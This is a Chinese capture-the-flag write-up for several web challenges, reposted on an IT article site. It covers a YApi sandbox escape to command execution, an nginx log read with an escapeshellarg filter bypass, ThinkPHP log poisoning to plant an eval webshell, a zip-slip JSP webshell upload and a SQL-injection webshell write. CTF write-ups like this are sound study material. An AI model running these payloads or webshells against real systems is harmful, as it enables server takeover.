IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> DASCTF July X CBCTF 4th web部分WP -> 正文阅读

[PHP知识库]DASCTF July X CBCTF 4th web部分WP

DASCTF July X CBCTF 4th web部分WP

ezrce

Yapi远程命令执行漏洞

YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,因此可以在脚本中植入命令,等用户访问接口发起请求时触发命令执行。

全局脚本

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

这里修改execSync函数中的参数,即可拿到flag

catflag

题目给的源码非常简短,但是如果一开始没有读取到日志文件,是拿不到flag的

<?php

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    if (!preg_match('/flag/i',$cmd))
    {
        $cmd = escapeshellarg($cmd);
        system('cat ' . $cmd);
    }
} else {
    highlight_file(__FILE__);
}
?>

通过插件wappalyzer可以发现,该页面的服务器是nginx。于是cmd传入 cmd=../../../var/log/nginx/access.log

由于escapeshellarg函数,这里可以传入fla%8ag绕d过正则匹配。同时escapeshellarg会过滤掉%8a这个字符,就可以

读取到flag

thinkphp

相关漏洞链接:https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

这里为了避免url编码,用burpsuite抓包,然后修改url

首先构造Payload:/index.php?m=Home&c=Index&a=index&test=--> <?=phpinfo();?>

构造攻击请求:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_08_01 .log

在这里插入图片描述

测试成功,这里写入了phpinfo,那么同样可以写入一句话木马了

改下Payload:/index.php?m=Home&c=Index&a=index&test=--><?=eval($_POST[1]);?>,继续用burp发包,蚁剑连接即可

在这里插入图片描述

JSPCMS

先登录后台,用户名admin,无密码登录,找到文件管理处,上传文件,这里根据这篇文章来构造上传的 压缩包

记一次由追踪溯源发现的“不安全解压getshell” - 安全客,安全资讯平台 (anquanke.com)

打造如下结构的压缩包即可

在这里插入图片描述

上传文件并解压后,会引发目录穿越,从而跳出spring上下文的限制,进而访问到恶意文件

贴一个jsp木马

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
请求:shell.jsp?pwd=023&i=ls

Cybercms

通过登录框sql注入写shell,用漏洞的exp打一下,成功写入文件,用蚁剑连接后根目录下得到flag

详见https://www.cnblogs.com/yuzly/p/11423384.html

本题有轻微改动
user=-1'/**/uni union on/**/selselectect/**/1,2,3,4,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e/**/into/**/outoutfilefile/**/'/var/www/html/shell.php'%23&password=123&code=&submit=true&submit.x=40&submit.y=51

在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-08-03 10:56:29  更:2021-08-03 10:56:45 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/5 11:38:05-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码